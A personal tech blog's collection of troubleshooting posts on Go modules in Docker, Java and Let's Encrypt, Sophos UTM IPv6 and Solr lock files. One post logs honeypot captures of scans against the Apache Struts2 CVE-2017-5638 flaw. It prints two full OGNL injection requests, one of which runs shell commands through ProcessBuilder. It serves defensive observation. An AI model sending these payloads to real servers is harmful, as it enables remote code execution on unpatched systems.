Categories
Development

go: cannot find main module; see ‘go help modules’

I was working on building a Docker image containing a go application when i ran in to the following error when running go tidy as a build step:
“go: cannot find main module; see ‘go help modules'”

The reason for this was that i had forgotten to specify a workdir in my Dockerimage (Alternatively, specified a go dir). Thus a fail safe error is triggered, as go simply gets confused over finding a go.mod in the gopath root folder, which is supposed to be within your source folder. [source]

The fix? Specify a WORKDIR in your Dockerfile.

Categories
Java

Java + LetsEncrypt certificate giving SunCertPathBuilderException

During testing some java code i have for doing a check against check.torproject.org i got an exception is have not seen before:

PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target

After digging around i realised that the site in question has started using certificates from Lets Encrypt.

Java keeps their known certificate providers bundled with the installation, so if your JRE/JDK installation is not quite up to date, it will be as simple as to simply upgrade to the latest release. (Anything >= Oracle Java 8u101 has Lets Encrypt root cert bundled)

Categories
Networking

CVE-2017-5638 scanning still going on

I recently wrote a honey pot that i am currently playing around with. It did not take long before suspicious traffic started popping up. Many of the scans/hacking attempts are against CVE-2017-5638, which relates to a security issue in Apache Struts2 that started getting exploited in march 2017.

The scans/hacking attempts i have seen regarding this the last 24 hours are listed below, they do nothing more than to see if the seucurity hole exist.

Type 1:

GET / HTTP/1.1
Content-Type: %{(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#wmres=#context[‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’]).(#wmres.getWriter().print(“S2-045 dir–***”)).(#wmreq=#context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletRequest’)).(#wmres.getWriter().println(#wmreq.getSession().getServletContext().getRealPath(“/”))).(#wmres.getWriter().flush()).(#wmres.getWriter().close())}.multipart/form-data
Accept: */*
Referer: http://**my Ihoneypot P**:81
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host:**my Ihoneypot P**:81
Connection: Keep-Alive

 

Type 2:

GET /index.action HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: */*
Content-Type: %{(#nike=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’whoami’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,’echo windows–2017′}:{‘/bin/bash’,’-c’,’echo linux–2017′})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Host:**my Ihoneypot P**:81
Connection: Keep-Alive

Categories
Networking

How to enable IPv6 on your Sophos UTM (Former Astaro Unified Threat Management)

Step 1: After logging in to the admin interface, go to Interfaces and Routing -> IPv6, and enable “IPv6 status”. As my UTM recieve a IPv6 prefix from my ISP, i end up with this: 1   Step 2: Assign an IPv6 address to your internal interface. This address should be the first IP in your assigned IPv6 prefix. To calculate your range, copy your delegated prefix and go to this calculator. Notice that i have used a /64-prefix internally. 2   Step 3: Go to Interfaces and Routing -> IPv6 -> Prefix Advertisement. Select your internal interface. Then add the IPv6 address of your DNS Server, or the IP of your internal interface of your UTM handes DNS itself. 3   And voila, your internal clients should now be able to recieve IPv6 addresses. I recommend rebooting both the UTM and any clients if they do not get any addresses at this point.

Categories
Software

How to fix LockObtainFailedException on Solr start

If you have experienced a Solr crash during a commit (which, of course, is the worst possible time, Murphy`s law etc), you might have received a LockOptianFailedException when trying to start Solr. This makes it impossible to start Solr at all.

You can solve this by configuring Solr to delete any lock files when starting up,
you can also configure Solr to use a normal lock file instead, which you can manually delete if you prefer that.

Simply correct your solrconfig.xml to the following values, they are per default
commented out in solrconfig.xml.

<lockType>simple</lockType>
<unlockOnStartup>true</unlockOnStartup>